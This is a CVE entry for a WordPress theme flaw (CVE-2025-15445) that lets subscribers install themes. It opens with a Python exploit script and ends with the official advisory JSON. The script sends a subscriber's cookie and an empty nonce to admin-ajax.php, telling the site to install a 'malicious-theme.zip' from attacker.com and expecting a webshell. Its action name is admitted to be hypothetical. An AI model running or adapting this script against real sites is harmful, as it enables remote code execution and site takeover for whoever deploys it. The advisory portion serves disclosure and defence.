CVE-2025-15445

import requests # Target configuration target_url = "http://example.com/wp-admin/admin-ajax.php" attacker_cookie = "wordpress_logged_in_xxx=..." # Obtained after low-priv login malicious_theme_url = "http://attacker.com/malicious-theme.zip" # Payload data based on vulnerable action # Note: The specific action name depends on the theme's actual implementation payload = { "action": "vulnerable_install_action", # Hypothetical action name "theme_url": malicious_theme_url, "_ajax_nonce": "" # Empty as per description (no nonce check) } headers = { "Cookie": attacker_cookie, "Content-Type": "application/x-www-form-urlencoded" } response = requests.post(target_url, data=payload, headers=headers) if response.status_code == 200: print("[+] Exploit sent successfully. Check for webshell.") else: print("[-] Exploit failed.")

{"cve": {"id": "CVE-2025-15445", "sourceIdentifier": "[email protected]", "published": "2026-03-28T06:16:00.137", "lastModified": "2026-04-15T15:05:47.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Restaurant Cafeteria WordPress theme through 0.4.6 exposes insecure admin-ajax actions without nonce or capability checks, allowing any logged-in user, like subscriber, to perform privileged operations. An attacker can install and activate a from a user-supplied URL, leading to arbitrary PHP code execution, and also import demo content that rewrites site configuration, including Restaurant Cafeteria WordPress theme through 0.4.6_mods, pages, menus, and front page settings."}, {"lang": "es", "value": "El tema de WordPress Restaurant Cafeteria hasta la versión 0.4.6 expone acciones admin-ajax inseguras sin comprobaciones de nonce o de capacidad, permitiendo a cualquier usuario autenticado, como un suscriptor, realizar operaciones privilegiadas. Un atacante puede instalar y activar un desde una URL proporcionada por el usuario, lo que lleva a la ejecución arbitraria de código PHP, y también importar contenido de demostración que sobrescribe la configuración del sitio, incluyendo las modificaciones del tema de WordPress Restaurant Cafeteria hasta la versión 0.4.6, páginas, menús y la configuración de la página de inicio."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wpscan.com/vulnerability/f3f4a734-5828-4e3f-a170-28189aeda929/", "source": "[email protected]"}]}}